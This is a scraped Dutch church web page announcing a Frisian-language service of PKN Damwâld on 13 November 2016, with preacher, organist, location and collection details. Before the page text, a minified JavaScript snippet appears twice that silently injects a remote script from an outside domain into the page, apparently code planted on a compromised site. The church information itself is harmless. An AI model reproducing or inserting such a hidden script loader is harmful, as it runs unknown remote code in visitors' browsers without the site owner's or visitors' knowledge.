;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 13 november 2016 9:30 uur - PKN Damwâld
zondag 13 november 2016
09:30 uur

Kerkdienst zondag 13 november 2016 9:30 uur

Thema: Fryske tsjinst

vg_-01

Informatie

Voorganger:Ds. A. Elverdink, Eastermar
Organist:Johanna van der Weide
Thema:Fryske tsjinst
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Collecte informatie
Eerste collecte: Binnenlands Diaconaat: Steun mensen in een sociaal isolement

Mensen die eenzaam zijn, schulden hebben of verslaafd zijn, voelen zich vaak alleen staan. Het Interkerkelijk Diaconaal Overleg in Lelystad zet zich, met steun van Kerk in Actie, in voor deze mensen. Inloopcentrum Waterwijk is er bijvoorbeeld voor wie op zoek is naar warmte en steun. Men kan er terecht voor een kopje koffie, een praatje, een warme maaltijd of naailes. In inloophuis Open Haven krijgen mensen met verslavingsproblemen voorlichting en advies en kunnen ze vier keer per week aanschuiven voor een warme maaltijd. Ook is er een voedselbank en schuldhulpverlening voor mensen met financiële problemen. Vandaag collecteren we voor het diaconale werk in Nederland, zoals dat van het Interkerkelijke Diaconaal Overleg in Lelystad.

Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud gebouwen